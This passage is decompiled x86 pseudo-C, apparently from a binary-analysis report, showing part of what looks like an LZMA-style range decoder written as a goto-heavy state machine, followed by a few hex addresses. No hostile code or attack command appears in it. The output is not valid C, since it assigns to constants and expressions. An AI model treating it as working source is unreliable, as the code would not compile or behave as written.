                                                                  													__ecx =  *(__ebp - 4);
                                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                                  													 *(__ebp - 0x84) = 9;
                                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                  												}
                                                                  												while(1) {
                                                                  													L132:
                                                                  													 *(_t613 - 0x54) = _t606;
                                                                  													goto L133;
                                                                  												}
                                                                  											case 9:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													goto L89;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x60);
                                                                  												if( *(__ebp - 0x60) == 0) {
                                                                  													goto L171;
                                                                  												}
                                                                  												__eax = 0;
                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  												__eflags = _t259;
                                                                  												0 | _t259 = _t259 + _t259 + 9;
                                                                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                  												goto L76;
                                                                  											case 0xa:
                                                                  												goto L0;
                                                                  											case 0xb:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__ecx =  *(__ebp - 0x24);
                                                                  													__eax =  *(__ebp - 0x20);
                                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  												} else {
                                                                  													__eax =  *(__ebp - 0x24);
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x28);
                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  												goto L88;
                                                                  											case 0xc:
                                                                  												L99:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xc;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t334 = __ebp - 0x70;
                                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t334;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												goto L101;
                                                                  											case 0xd:
                                                                  												L37:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xd;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t122 = __ebp - 0x70;
                                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t122;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												L39:
                                                                  												__eax =  *(__ebp - 0x40);
                                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  													goto L48;
                                                                  												}
                                                                  												__eflags = __ebx - 0x100;
                                                                  												if(__ebx >= 0x100) {
                                                                  													goto L54;
                                                                  												}
                                                                  												L41:
                                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  												__ecx =  *(__ebp - 0x58);
                                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  												 *(__ebp - 0x48) = __eax;
                                                                  												__eax = __eax + 1;
                                                                  												__eax = __eax << 8;
                                                                  												__eax = __eax + __ebx;
                                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  												__ax =  *__esi;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__edx = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													 *(__ebp - 0x40) = 1;
                                                                  													__cx = __ax >> 5;
                                                                  													__eflags = __eax;
                                                                  													__ebx = __ebx + __ebx + 1;
                                                                  													 *__esi = __ax;
                                                                  												} else {
                                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edx;
                                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													goto L39;
                                                                  												} else {
                                                                  													goto L37;
                                                                  												}
                                                                  											case 0xe:
                                                                  												L46:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xe;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t156 = __ebp - 0x70;
                                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t156;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												while(1) {
                                                                  													L48:
                                                                  													__eflags = __ebx - 0x100;
                                                                  													if(__ebx >= 0x100) {
                                                                  														break;
                                                                  													}
                                                                  													__eax =  *(__ebp - 0x58);
                                                                  													__edx = __ebx + __ebx;
                                                                  													__ecx =  *(__ebp - 0x10);
                                                                  													__esi = __edx + __eax;
                                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  													__ax =  *__esi;
                                                                  													 *(__ebp - 0x54) = __esi;
                                                                  													__edi = __ax & 0x0000ffff;
                                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  														__cx = __ax;
                                                                  														_t170 = __edx + 1; // 0x1
                                                                  														__ebx = _t170;
                                                                  														__cx = __ax >> 5;
                                                                  														__eflags = __eax;
                                                                  														 *__esi = __ax;
                                                                  													} else {
                                                                  														 *(__ebp - 0x10) = __ecx;
                                                                  														0x800 = 0x800 - __edi;
                                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  														__ebx = __ebx + __ebx;
                                                                  														 *__esi = __cx;
                                                                  													}
                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  														continue;
                                                                  													} else {
                                                                  														goto L46;
                                                                  													}
                                                                  												}
                                                                  												L54:
                                                                  												_t173 = __ebp - 0x34;
                                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                  												__eflags =  *_t173;
                                                                  												goto L55;
                                                                  											case 0xf:
                                                                  												L58:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0xf;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t203 = __ebp - 0x70;
                                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t203;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												L60:
                                                                  												__eflags = __ebx - 0x100;
                                                                  												if(__ebx >= 0x100) {
                                                                  													L55:
                                                                  													__al =  *(__ebp - 0x44);
                                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                  													goto L56;
                                                                  												}
                                                                  												L61:
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												__edx = __ebx + __ebx;
                                                                  												__ecx =  *(__ebp - 0x10);
                                                                  												__esi = __edx + __eax;
                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  												__ax =  *__esi;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__edi = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													_t217 = __edx + 1; // 0x1
                                                                  													__ebx = _t217;
                                                                  													__cx = __ax >> 5;
                                                                  													__eflags = __eax;
                                                                  													 *__esi = __ax;
                                                                  												} else {
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edi;
                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													goto L60;
                                                                  												} else {
                                                                  													goto L58;
                                                                  												}
                                                                  											case 0x10:
                                                                  												L109:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0x10;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t365 = __ebp - 0x70;
                                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t365;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												goto L111;
                                                                  											case 0x11:
                                                                  												goto L69;
                                                                  											case 0x12:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													__eax =  *(__ebp - 0x58);
                                                                  													 *(__ebp - 0x84) = 0x13;
                                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                                  													while(1) {
                                                                  														L132:
                                                                  														 *(_t613 - 0x54) = _t606;
                                                                  														goto L133;
                                                                  													}
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x4c);
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                  												__ecx =  *(__ebp - 0x58);
                                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                                  												__eflags = __eax;
                                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                  												goto L130;
                                                                  											case 0x13:
                                                                  												__eflags =  *(__ebp - 0x40);
                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                  													_t469 = __ebp - 0x58;
                                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                  													__eflags =  *_t469;
                                                                  													 *(__ebp - 0x30) = 0x10;
                                                                  													 *(__ebp - 0x40) = 8;
                                                                  													L144:
                                                                  													 *(__ebp - 0x7c) = 0x14;
                                                                  													goto L145;
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x4c);
                                                                  												__ecx =  *(__ebp - 0x58);
                                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                                  												 *(__ebp - 0x30) = 8;
                                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                  												L130:
                                                                  												 *(__ebp - 0x58) = __eax;
                                                                  												 *(__ebp - 0x40) = 3;
                                                                  												goto L144;
                                                                  											case 0x14:
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                  												__eax =  *(__ebp - 0x80);
                                                                  												 *(_t613 - 0x88) = _t533;
                                                                  												goto L1;
                                                                  											case 0x15:
                                                                  												__eax = 0;
                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  												__al = __al & 0x000000fd;
                                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                  												goto L120;
                                                                  											case 0x16:
                                                                  												__eax =  *(__ebp - 0x30);
                                                                  												__eflags = __eax - 4;
                                                                  												if(__eax >= 4) {
                                                                  													_push(3);
                                                                  													_pop(__eax);
                                                                  												}
                                                                  												__ecx =  *(__ebp - 4);
                                                                  												 *(__ebp - 0x40) = 6;
                                                                  												__eax = __eax << 7;
                                                                  												 *(__ebp - 0x7c) = 0x19;
                                                                  												 *(__ebp - 0x58) = __eax;
                                                                  												goto L145;
                                                                  											case 0x17:
                                                                  												L145:
                                                                  												__eax =  *(__ebp - 0x40);
                                                                  												 *(__ebp - 0x50) = 1;
                                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                  												goto L149;
                                                                  											case 0x18:
                                                                  												L146:
                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                  													 *(__ebp - 0x88) = 0x18;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x70);
                                                                  												__eax =  *(__ebp - 0xc);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												_t484 = __ebp - 0x70;
                                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                  												__eflags =  *_t484;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  												L148:
                                                                  												_t487 = __ebp - 0x48;
                                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                  												__eflags =  *_t487;
                                                                  												L149:
                                                                  												__eflags =  *(__ebp - 0x48);
                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                  													__ecx =  *(__ebp - 0x40);
                                                                  													__ebx =  *(__ebp - 0x50);
                                                                  													0 = 1;
                                                                  													__eax = 1 << __cl;
                                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                  													__eax =  *(__ebp - 0x7c);
                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                  													while(1) {
                                                                  														 *(_t613 - 0x88) = _t533;
                                                                  														goto L1;
                                                                  													}
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x50);
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												__esi = __edx + __eax;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__ax =  *__esi;
                                                                  												__edi = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													__cx = __ax >> 5;
                                                                  													__eax = __eax - __ecx;
                                                                  													__edx = __edx + 1;
                                                                  													__eflags = __edx;
                                                                  													 *__esi = __ax;
                                                                  													 *(__ebp - 0x50) = __edx;
                                                                  												} else {
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edi;
                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													goto L148;
                                                                  												} else {
                                                                  													goto L146;
                                                                  												}
                                                                  											case 0x19:
                                                                  												__eflags = __ebx - 4;
                                                                  												if(__ebx < 4) {
                                                                  													 *(__ebp - 0x2c) = __ebx;
                                                                  													L119:
                                                                  													_t393 = __ebp - 0x2c;
                                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                  													__eflags =  *_t393;
                                                                  													L120:
                                                                  													__eax =  *(__ebp - 0x2c);
                                                                  													__eflags = __eax;
                                                                  													if(__eax == 0) {
                                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                  														goto L170;
                                                                  													}
                                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                                  														goto L171;
                                                                  													}
                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                  													__eax =  *(__ebp - 0x30);
                                                                  													_t400 = __ebp - 0x60;
                                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                  													__eflags =  *_t400;
                                                                  													goto L123;
                                                                  												}
                                                                  												__ecx = __ebx;
                                                                  												__eax = __ebx;
                                                                  												__ecx = __ebx >> 1;
                                                                  												__eax = __ebx & 0x00000001;
                                                                  												__ecx = (__ebx >> 1) - 1;
                                                                  												__al = __al | 0x00000002;
                                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                                  												__eflags = __ebx - 0xe;
                                                                  												 *(__ebp - 0x2c) = __eax;
                                                                  												if(__ebx >= 0xe) {
                                                                  													__ebx = 0;
                                                                  													 *(__ebp - 0x48) = __ecx;
                                                                  													L102:
                                                                  													__eflags =  *(__ebp - 0x48);
                                                                  													if( *(__ebp - 0x48) <= 0) {
                                                                  														__eax = __eax + __ebx;
                                                                  														 *(__ebp - 0x40) = 4;
                                                                  														 *(__ebp - 0x2c) = __eax;
                                                                  														__eax =  *(__ebp - 4);
                                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                                  														__eflags = __eax;
                                                                  														L108:
                                                                  														__ebx = 0;
                                                                  														 *(__ebp - 0x58) = __eax;
                                                                  														 *(__ebp - 0x50) = 1;
                                                                  														 *(__ebp - 0x44) = 0;
                                                                  														 *(__ebp - 0x48) = 0;
                                                                  														L112:
                                                                  														__eax =  *(__ebp - 0x40);
                                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                  															_t391 = __ebp - 0x2c;
                                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                  															__eflags =  *_t391;
                                                                  															goto L119;
                                                                  														}
                                                                  														__eax =  *(__ebp - 0x50);
                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  														__eax =  *(__ebp - 0x58);
                                                                  														__esi = __edi + __eax;
                                                                  														 *(__ebp - 0x54) = __esi;
                                                                  														__ax =  *__esi;
                                                                  														__ecx = __ax & 0x0000ffff;
                                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                                  															__ecx = 0;
                                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                  															__ecx = 1;
                                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                  															__ebx = 1;
                                                                  															__ecx =  *(__ebp - 0x48);
                                                                  															__ebx = 1 << __cl;
                                                                  															__ecx = 1 << __cl;
                                                                  															__ebx =  *(__ebp - 0x44);
                                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                  															__cx = __ax;
                                                                  															__cx = __ax >> 5;
                                                                  															__eax = __eax - __ecx;
                                                                  															__edi = __edi + 1;
                                                                  															__eflags = __edi;
                                                                  															 *(__ebp - 0x44) = __ebx;
                                                                  															 *__esi = __ax;
                                                                  															 *(__ebp - 0x50) = __edi;
                                                                  														} else {
                                                                  															 *(__ebp - 0x10) = __edx;
                                                                  															0x800 = 0x800 - __ecx;
                                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  															 *__esi = __dx;
                                                                  														}
                                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  															L111:
                                                                  															_t368 = __ebp - 0x48;
                                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                  															__eflags =  *_t368;
                                                                  															goto L112;
                                                                  														} else {
                                                                  															goto L109;
                                                                  														}
                                                                  													}
                                                                  													__ecx =  *(__ebp - 0xc);
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                  														__ecx =  *(__ebp - 0x10);
                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  														__ebx = __ebx | 0x00000001;
                                                                  														__eflags = __ebx;
                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                  													}
                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  														L101:
                                                                  														_t338 = __ebp - 0x48;
                                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                  														__eflags =  *_t338;
                                                                  														goto L102;
                                                                  													} else {
                                                                  														goto L99;
                                                                  													}
                                                                  												}
                                                                  												__edx =  *(__ebp - 4);
                                                                  												__eax = __eax - __ebx;
                                                                  												 *(__ebp - 0x40) = __ecx;
                                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                  												goto L108;
                                                                  											case 0x1a:
                                                                  												L56:
                                                                  												__eflags =  *(__ebp - 0x64);
                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                  													 *(__ebp - 0x88) = 0x1a;
                                                                  													goto L170;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 0x68);
                                                                  												__al =  *(__ebp - 0x5c);
                                                                  												__edx =  *(__ebp - 8);
                                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  												 *( *(__ebp - 0x68)) = __al;
                                                                  												__ecx =  *(__ebp - 0x14);
                                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                  												__eax = __ecx + 1;
                                                                  												__edx = 0;
                                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                  												__edx = _t192;
                                                                  												goto L80;
                                                                  											case 0x1b:
                                                                  												L76:
                                                                  												__eflags =  *(__ebp - 0x64);
                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                  													 *(__ebp - 0x88) = 0x1b;
                                                                  													goto L170;
                                                                  												}
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                  													__eflags = __eax;
                                                                  												}
                                                                  												__edx =  *(__ebp - 8);
                                                                  												__cl =  *(__eax + __edx);
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                  												 *(__eax + __edx) = __cl;
                                                                  												__eax = __eax + 1;
                                                                  												__edx = 0;
                                                                  												_t275 = __eax %  *(__ebp - 0x74);
                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                  												__edx = _t275;
                                                                  												__eax =  *(__ebp - 0x68);
                                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  												_t284 = __ebp - 0x64;
                                                                  												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                  												__eflags =  *_t284;
                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                  												L80:
                                                                  												 *(__ebp - 0x14) = __edx;
                                                                  												goto L81;
                                                                  											case 0x1c:
                                                                  												while(1) {
                                                                  													L123:
                                                                  													__eflags =  *(__ebp - 0x64);
                                                                  													if( *(__ebp - 0x64) == 0) {
                                                                  														break;
                                                                  													}
                                                                  													__eax =  *(__ebp - 0x14);
                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                  														__eflags = __eax;
                                                                  													}
                                                                  													__edx =  *(__ebp - 8);
                                                                  													__cl =  *(__eax + __edx);
                                                                  													__eax =  *(__ebp - 0x14);
                                                                  													 *(__ebp - 0x5c) = __cl;
                                                                  													 *(__eax + __edx) = __cl;
                                                                  													__eax = __eax + 1;
                                                                  													__edx = 0;
                                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                                  													__edx = _t414;
                                                                  													__eax =  *(__ebp - 0x68);
                                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                  													__eflags =  *(__ebp - 0x30);
                                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                                  													 *(__ebp - 0x14) = _t414;
                                                                  													if( *(__ebp - 0x30) > 0) {
                                                                  														continue;
                                                                  													} else {
                                                                  														L81:
                                                                  														 *(__ebp - 0x88) = 2;
                                                                  														goto L1;
                                                                  													}
                                                                  												}
                                                                  												 *(__ebp - 0x88) = 0x1c;
                                                                  												goto L170;
                                                                  										}
                                                                  									}
                                                                  									L171:
                                                                  									_t535 = _t534 | 0xffffffff;
                                                                  									goto L172;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					goto L1;
                                                                  				}
                                                                  			}













                                                                  0x00000000
                                                                  0x004066f0
                                                                  0x004066f0
                                                                  0x004066f4
                                                                  0x00406701
